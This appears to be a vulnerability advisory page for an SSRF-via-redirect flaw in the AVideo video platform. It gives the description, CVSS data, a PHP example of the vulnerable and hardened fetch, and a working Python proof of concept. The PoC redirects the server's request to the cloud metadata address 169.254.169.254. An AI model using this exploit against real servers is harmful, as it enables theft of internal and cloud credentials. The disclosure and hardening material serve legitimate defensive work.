Security Vulnerability Report
CVE-2026-43884 CVSS 7.7 HIGH

CVE-2026-43884

Published: 2026-05-11 22:22:13
Last Modified: 2026-05-11 22:22:13

Description

WWBN AVideo is an open source video platform. In versions up to and including 29.0, two endpoints (plugin/AI/receiveAsync.json.php and objects/EpgParser.php) in AVideo call isSSRFSafeURL() to validate user-supplied URLs, then fetch them using bare file_get_contents() without disabling PHP's automatic redirect following. An attacker can supply a URL pointing to a server they control that returns a 302 redirect to an internal/cloud-metadata address (e.g., http://169.254.169.254/latest/meta-data/). Since isSSRFSafeURL() only validates the initial URL, the redirect target bypasses all SSRF protections. Commit 603e7bf77a835584387327e35560262feb075db3 contains an updated fix.
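As an added example (not AVideo's code and not the fix commit referenced above), here is the vulnerable pattern the description names beside a hardened fetch: redirect following is switched off in the http stream context, each Location hop is re-validated by the same SSRF check, and the hop count is bounded. is_ssrf_safe_url() is an assumed stand-in for the project's isSSRFSafeURL(), built on PHP's filter flags.

```php
<?php
// Added example (not AVideo's code); is_ssrf_safe_url() stands in for isSSRFSafeURL().
function is_ssrf_safe_url(string $url): bool {
    $scheme = parse_url($url, PHP_URL_SCHEME);
    $host   = parse_url($url, PHP_URL_HOST);
    if (!$host || !in_array($scheme, ['http', 'https'], true)) {
        return false;
    }
    // Reject private and reserved ranges; 169.254.0.0/16 (cloud metadata) falls under
    // FILTER_FLAG_NO_RES_RANGE. IPv4 only; DNS rebinding after this resolve is not handled.
    $ip = gethostbyname($host);
    return filter_var($ip, FILTER_VALIDATE_IP,
        FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE) !== false;
}
// Vulnerable pattern from the advisory: only the initial URL is checked, then
// file_get_contents() follows a 302 wherever it points.
function fetch_vulnerable(string $url) {
    return is_ssrf_safe_url($url) ? file_get_contents($url) : false;
}
// Hardened: never auto-follow; re-check every hop with the same SSRF test, bounded hops.
function fetch_hardened(string $url, int $maxHops = 3) {
    $ctx = stream_context_create(['http' => [
        'follow_location' => 0,    // do not chase Location: automatically
        'ignore_errors'   => true, // return 4xx/5xx bodies instead of false
        'timeout'         => 5,
    ]]);
    for ($hop = 0; $hop <= $maxHops; $hop++) {
        if (!is_ssrf_safe_url($url)) {
            return false;          // a hop to 169.254.169.254 is refused here
        }
        $body = @file_get_contents($url, false, $ctx);
        $status = 0; $location = null;
        foreach ($http_response_header ?? [] as $h) {
            if (preg_match('#^HTTP/\S+\s+(\d{3})#', $h, $m)) {
                $status = (int) $m[1];
            } elseif (stripos($h, 'Location:') === 0) {
                $location = trim(substr($h, 9));
            }
        }
        if ($status < 300 || $status > 399 || $location === null) {
            return $body;          // final response, not a redirect
        }
        if (parse_url($location, PHP_URL_SCHEME) === null) {
            return false;          // relative Location: refuse rather than resolve
        }
        $url = $location;
    }
    return false;                  // too many redirects
}
```

Using cURL instead of the stream wrapper gives the same outcome with CURLOPT_FOLLOWLOCATION set to false and the same per-hop loop around CURLINFO_REDIRECT_URL.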

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

WWBN AVideo <= 29.0 (no structured configuration data available)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# This PoC demonstrates how to exploit the SSRF via redirect.
# It sets up a malicious server that redirects to an internal metadata service.
import threading
import time
from http.server import HTTPServer, BaseHTTPRequestHandler

import requests


class MaliciousRedirectHandler(BaseHTTPRequestHandler):
    """
    Handler that redirects incoming requests to a sensitive internal address.
    This simulates the attacker-controlled server.
    """

    def do_GET(self):
        # Log the request from the vulnerable server
        print(f"[*] Received request from: {self.client_address[0]}")
        # Send a 302 Redirect to the AWS Metadata Service (or other internal target)
        # This bypasses isSSRFSafeURL() because the initial URL was 'attacker.com'
        target_internal_url = "http://169.254.169.254/latest/meta-data/"
        self.send_response(302)
        self.send_header('Location', target_internal_url)
        self.end_headers()

    def log_message(self, format, *args):
        # Suppress default logging
        pass


def start_redirect_server(port=8000):
    """Starts the HTTP server in a separate thread."""
    server = HTTPServer(('0.0.0.0', port), MaliciousRedirectHandler)
    thread = threading.Thread(target=server.serve_forever)
    thread.daemon = True
    thread.start()
    print(f"[*] Malicious redirect server listening on 0.0.0.0:{port}")
    return server


if __name__ == "__main__":
    # 1. Start the attacker's server
    start_redirect_server()
    attacker_url = "http://attacker-server-ip:8000"

    # 2. Target URL (Vulnerable Endpoint)
    # Replace with actual target IP/Domain
    target_endpoint = "http://localhost/avideo/plugin/AI/receiveAsync.json.php"
    print(f"[*] Attempting to trigger SSRF on {target_endpoint}")
    print(f"[*] Payload URL: {attacker_url}")

    # 3. Send the payload
    # The parameter name 'url' might vary based on the actual endpoint implementation
    try:
        data = {"url": attacker_url}
        response = requests.post(target_endpoint, data=data, timeout=5)
        print(f"[*] Request sent. Status code: {response.status_code}")
        print("[*] If vulnerable, the server has now fetched http://169.254.169.254/latest/meta-data/")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

    # Keep script running to handle the redirect request
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print("\n[*] Shutting down server.")
```

References

https://github.com/WWBN/AVideo/commit/603e7bf77a835584387327e35560262feb075db3
https://github.com/WWBN/AVideo/security/advisories/GHSA-2hch-c97c-g99x

Weakness

CWE-918 (Server-Side Request Forgery)

Status

Received (exploitability subscore 3.1, impact subscore 4.0)